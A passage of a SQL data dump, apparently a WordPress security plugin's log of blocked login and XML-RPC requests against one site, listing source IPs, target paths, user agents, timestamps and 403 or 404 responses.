Firefox\\/96\"}','6CudpwUnktR2yVLK5BP4ZaFl',0,1665060441.2274,495,'','POST',403,0,600,0,1,'',0),('137.184.117.52',2310567220,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','9JzdsUeEAxZWTyjOhbtkgISq',0,1665060581.5763,14338,'','POST',403,0,600,0,1,'',0),('167.71.141.164',2806484388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','hQ3pRG5egZmtcAaF0InsEJLH',0,1665060630.1063,3415,'','POST',403,0,600,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','0RowkAOpeD1rsZf49jBIaldN',0,1665060696.5432,640,'','POST',403,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','MpQwzbyd6uBnSGIcfrvgDm5x',0,1665060697.8147,526,'','POST',403,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','8G4ayRPlnWVc3BtrO2oELizk',0,1665060698.9661,495,'','POST',403,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','dk1lYgoBjAq27wJTZcNPQ0XO',0,1665060700.2602,584,'','POST',403,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','il3DOgemKEHvIMo4ztSd5bFT',0,1665060701.4672,543,'','POST',403,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','mD2vIlneXuASiQac7dgfGNLF',0,1665060702.6069,442,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','4z0ALd7KtVrT2qxRY8FfhWlo',0,1665060703.7696,425,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','ZkQKEdg6IsB4tLor5e9qnhYN',0,1665060704.7755,450,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','gkpt1aWNmEcyVTdRDBHJ2o7q',0,1665060705.7618,527,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','vuG1NQwVYecDRgs5yIJ976mj',0,1665060706.8363,410,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','uagm3URCBQ0wZ65hV4zLXWfH',0,1665060707.9661,503,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','EC5INxKXdBWALio769qsarZz',0,1665060709.2065,446,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','EymM0xB9Y8FRO6kqDTit7Spl',0,1665060710.3842,611,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','XVikSDAcnN8zrYuwIPRoOmUq',0,1665060711.7308,527,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','LpzQMYuO9cTKhNUxvetfCEXj',0,1665060712.9811,485,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','7GASxpgUWahBVPvtdDT1uyJN',0,1665060714.1662,310,'','POST',403,0,515,0,1,'',0),('95.173.161.171',1605214635,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JiIoQqL2APKUdrjVWHFhEnkg',0,1665061321.7281,18549,'','POST',403,0,515,0,1,'',0),('128.199.109.135',2160553351,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iA4ZjCJnfwg9byY6x3dzXDQM',0,1665061855.2594,19065,'','POST',403,0,515,0,1,'',0),('192.64.113.147',3225448851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SoEOaMnVCB2WeK7r6pH3JdhL',0,1665062431.4724,19108,'','POST',403,0,515,0,1,'',0),('207.188.157.79',3485244751,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','wRnr2EKahV3M0GFgL6ybxSP1',0,1665063095.0225,18312,'','POST',403,0,600,0,1,'',0),('95.217.179.54',1608102710,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','kMt2xDPKTUQbymf8dGeA1LI9',0,1665063140.2815,744,'','POST',403,0,600,0,1,'',0),('173.212.197.26',2916402458,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HyeLbs3NhRmgMKuwtW2YvjUa',0,1665063555.3949,18761,'','POST',403,0,515,0,1,'',0),('103.111.30.40',1735335464,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HonSLUMFN8VtaTEu1pjZPIsg',0,1665064100.4337,2404,'','POST',403,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','9kmEUSOZIGJiRs15YvAMjr3e',0,1665064316.4804,18600,'','POST',403,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','7utXebdqzGEPhQULr0k18AFc',0,1665064321.9572,13239,'','POST',403,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','w7XVoxemjLqB4lhIfSukTvag',0,1665064327.3882,8015,'','POST',403,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','OBePpWoVluNq8IZvbj6G1FJ7',0,1665064332.3352,3655,'','POST',403,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','LrWMBP8ehy6Gzo9dwA7qH43K',0,1665064336.6101,711,'','POST',403,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','Tbx6vaStkBmALnPs7W8flGQ1',0,1665064339.6093,483,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','JrRYls5tfNPozyvMBnTx47Vj',0,1665064340.7908,519,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','6FYNQMDxmPn9ztidTKEXa23h',0,1665064341.8784,499,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','QgCr73zZGxOLJ6c5iVEU0bHv',0,1665064342.9362,585,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','SKs7jwTXNFWBo05ryIfk4qEC',0,1665064344.0887,501,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','Uwd9q3ISrcp5AHOJoylL0Vfz',0,1665064345.3494,634,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','rhDJZUvpXqFCdoLb3mwenIAW',0,1665064346.6636,554,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','JcgFyMOlwsoVdx8T0q3GZBP7',0,1665064347.9353,503,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','t4Q17rCiTUSbJc2nLDqvFHIp',0,1665064349.1768,529,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','Fi2LRZUzVNra6S75PhADEnXu',0,1665064350.4036,522,'','POST',404,0,515,0,1,'',0),('14.29.247.201',236845001,'','http://www.cteisys.com/xmlrpc.php','','{\"1\":\"Apache-HttpClient\\/4.5.2 (Java\\/1.8.0_161)\"}','T2p9CBsyxudW6D5aQ1l08jvH',0,1665064351.6234,288,'','POST',403,0,515,0,1,'',0),('5.101.157.25',90545433,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Y69H3oBaGsLT2djcfpwOtAMb',0,1665064704.7283,19201,'','POST',403,0,515,0,1,'',0),('47.96.74.105',794839657,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','XKITJ0x9HSiDcYwnN7vMjpym',0,1665065616.0472,1391,'','POST',403,0,600,0,1,'',0),('148.72.214.245',2487801589,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','IELs3w8qjNaMVg0eXTUQnZ9x',0,1665065661.1569,1318,'','POST',403,0,600,0,1,'',0),('162.241.174.216',2733747928,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yb7KI4ja0utM38dpxJ5QUvgW',0,1665065840.5181,19460,'','POST',403,0,515,0,1,'',0),('74.208.103.228',1255172068,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EeUd2NTOD47GM8KyYtqhS1LR',0,1665067000.1744,19239,'','POST',403,0,515,0,1,'',0),('86.105.9.67',1449724227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','8xWn0tphar716GumHoOLe4Dl',0,1665067362.2303,1737,'','POST',403,0,515,0,1,'',0),('190.107.177.243',3194728947,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bjv0YUAk4tOew5dnhGExLZqz',0,1665067583.7255,1376,'','POST',403,0,515,0,1,'',0),('151.106.41.64',2540316992,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','flZUHedxQ3iow86OhmMGc4X7',0,1665068144.7483,16079,'','POST',403,0,600,0,1,'',0),('51.178.138.5',867338757,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','89dUkBfCzy2uSK4VJtQ7FMb5',0,1665068191.9996,482,'','POST',403,0,600,0,1,'',0),('80.77.135.125',1347258237,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dTIzOicL6ZwNKW40lgMJBVRU',0,1665068200.6214,1373,'','POST',403,0,515,0,1,'',0),('95.173.161.171',1605214635,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wL1CdMZUVWgDuz5olbQJ6cKa',0,1665068791.5817,3257,'','POST',403,0,515,0,1,'',0),('128.199.109.135',2160553351,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','b824cdVpCFzGqLPW1hKRXove',0,1665069358.3193,18767,'','POST',403,0,515,0,1,'',0),('139.59.117.30',2335929630,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZcXV3U20JlHfCrKLzeAjYPW1',0,1665070536.5378,7776,'','POST',403,0,515,0,1,'',0),('51.132.0.90',864288858,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','iXnLskNZFEAQHbh8geBf7CIu',0,1665070686.5021,590,'','POST',403,0,515,0,1,'',0),('51.132.0.90',864288858,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','OBgKoaMsRGLIkupjWTHUwnYt',0,1665070687.9444,654,'','POST',403,0,515,0,1,'',0),('51.132.0.90',864288858,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','t4JaISZsg3NwQ2MKCVf5PeYD',0,1665070689.3814,521,'','POST',403,0,515,0,1,'',0),('104.41.221.5',1747574021,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','1Pp0AySIRnOKqVZdGsJecaTx',0,1665070703.2599,605,'','POST',403,0,600,0,1,'',0),('69.163.186.158',1168358046,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','2wCxVdakZLTmWl8c6jEbRrPu',0,1665070750.4989,1202,'','POST',403,0,600,0,1,'',0),('103.116.16.173',1735659693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','E5Lg8mzvt7jnwFpeIbiO6yl2',0,1665071124.5173,2920,'','POST',403,0,515,0,1,'',0),('47.106.201.134',795527558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zAcg9DRY1m8UqrLVi23M5xpa',0,1665071713.9425,18300,'','POST',403,0,515,0,1,'',0),('192.64.113.147',3225448851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','R8SA6Od3ZvHWwysu4DqipTmJ',0,1665072323.5918,19486,'','POST',403,0,515,0,1,'',0),('93.114.185.76',1567799628,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','BRpTeu2Jo7rv4zSEDckPHjxl',0,1665073274.4996,17514,'','POST',403,0,600,0,1,'',0),('157.230.127.126',2649128830,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','1MspOG9X3LbdRruUwPiJleBC',0,1665073322.6765,1279,'','POST',403,0,600,0,1,'',0),('194.233.66.131',3270066819,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','E4pCgYcHPLVBfJKstk8e0TyF',0,1665073550.3261,865,'','POST',403,0,600,0,1,'',0),('51.91.83.187',861623227,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LBTAwPseJ5quoU3Ela26Yn1R',0,1665074710.1807,631,'','POST',403,0,600,0,1,'',0),('213.152.161.219',3583549915,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','IPQgmR62ZaeBjyw7tx5rTOzX',0,1665075222.3613,18649,'','POST',403,0,515,0,1,'',0),('217.174.248.107',3652122731,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JEPyRYxv47brCMh0lSmjpIHX',0,1665075730.6953,18719,'','POST',403,0,515,0,1,'',0),('82.165.184.74',1386592330,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','15zl3nKvIS794VGRechokZJP',0,1665075845.6637,1524,'','POST',403,0,600,0,1,'',0),('192.64.82.118',3225440886,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','Xawf23805mKSgi7nBN9TxUPe',0,1665075891.1635,1227,'','POST',403,0,600,0,1,'',0),('213.152.187.230',3583556582,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','5Tl7FXr1YwIHNx3SAM0EJvyK',0,1665076056.9844,19738,'','POST',403,0,515,0,1,'',0),('152.89.160.131',2556010627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','qzhRZLPE3weK9sdYlSTtaJio',0,1665077021.9922,19499,'','POST',403,0,515,0,1,'',0),('209.141.55.206',3515693006,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','TZpml9ugCqLMj7Pd3ryUo2Gn',0,1665077378.1986,1967,'','POST',403,0,600,0,1,'',0),('213.152.161.20',3583549716,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','AaJbQ9KmyrlLRszYdW2Eutqp',0,1665077555.3677,1403,'','POST',403,0,515,0,1,'',0),('75.119.157.181',1266130357,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','EM9Rw06dFykfNgxXJsriCm4U',0,1665078405.4829,17610,'','POST',403,0,600,0,1,'',0),('207.154.250.8',3483040264,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','vsiaIZ57WSFy4dq2xmco9G8r',0,1665078451.5500,560,'','POST',403,0,600,0,1,'',0),('213.152.162.149',3583550101,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Jd3hnF49gKuyC28abWQNoYBi',0,1665079948.5821,2537,'','POST',403,0,515,0,1,'',0),('213.152.162.149',3583550101,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','QbH2s0TFU8yXhkZAdRvwJPCD',0,1665079932.3159,18803,'','POST',403,0,515,0,1,'',0),('45.61.188.225',759020769,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','iUMCasJbgjDldrAREvx6BNVn',0,1665080162.9661,500,'','POST',403,0,600,0,1,'',0),('51.255.81.60',872370492,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','6g7Ue2rqsCFbiXAJIGjhN1n0',0,1665080950.7874,3839,'','POST',403,0,600,0,1,'',0),('166.0.235.97',2785078113,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','1lY3JvQ7ErPfdyi5mjcRa8Zb',0,1665080996.4254,1140,'','POST',403,0,600,0,1,'',0),('107.167.244.83',1806169171,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','6xzmK1HMiPLWu80ZVgICfncU',0,1665081741.3066,2613,'','POST',403,0,515,0,1,'',0),('213.152.161.25',3583549721,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','qlegXwnATU9PjJtW8GFHQ2pC',0,1665082112.5404,3957,'','POST',403,0,515,0,1,'',0),('188.166.120.27',3165026331,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','wuAoGn3cXmW8DChZJbUy09Tf',0,1665083513.7850,1390,'','POST',403,0,600,0,1,'',0),('91.214.169.69',1540794693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','E8kURxGuA4tohrPsSngN3ja2',0,1665084044.7883,19350,'','POST',403,0,515,0,1,'',0),('213.152.186.35',3583556131,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Ss5yaizke8HuBI7DVqQ9AOvG',0,1665084820.9453,18474,'','POST',403,0,515,0,1,'',0),('66.33.193.231',1109508583,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','ikjF0oQdSCwqHzVLfKl3xm7y',0,1665085868.4784,17731,'','POST',403,0,600,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','ZCu70m3yk59FvDbpJBArUqcL',0,1665085911.6027,11740,'','POST',403,0,600,0,1,'',0),('213.152.161.40',3583549736,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','TgA7juZOFf4DQpqar1R52dmc',0,1665086058.3844,17483,'','POST',403,0,515,0,1,'',0),('62.102.148.187',1046910139,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','xXCbIem8qKB7dY1FnJ4T5S2E',0,1665088951.4380,16998,'','POST',403,0,515,0,1,'',0),('45.61.188.225',759020769,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; Trident\\/7.0; rv:11.0) like Gecko\"}','Zimd9zwTy3NJE4MWAe0QLFqH',0,1665089982.1578,469,'','POST',403,0,600,0,1,'',0),('149.56.226.67',2503533123,'','https://mail.cteisys.com/owa/auth/logon.aspx?replaceCurrent=1&url=http%3A%2F%2Fmail.cteisys.com%2Fowa%2F','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','emXkGVYTWRiD8UOIjPrxncb5',0,1665090616.5869,11732,'','GET',403,0,700,0,1,'',0),('149.56.226.67',2503533123,'','https://cteisys.com/owa/auth/logon.aspx?replaceCurrent=1&url=https%3A%2F%2Fowa.cteisys.com%2Fowa%2F','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko\\/20100101 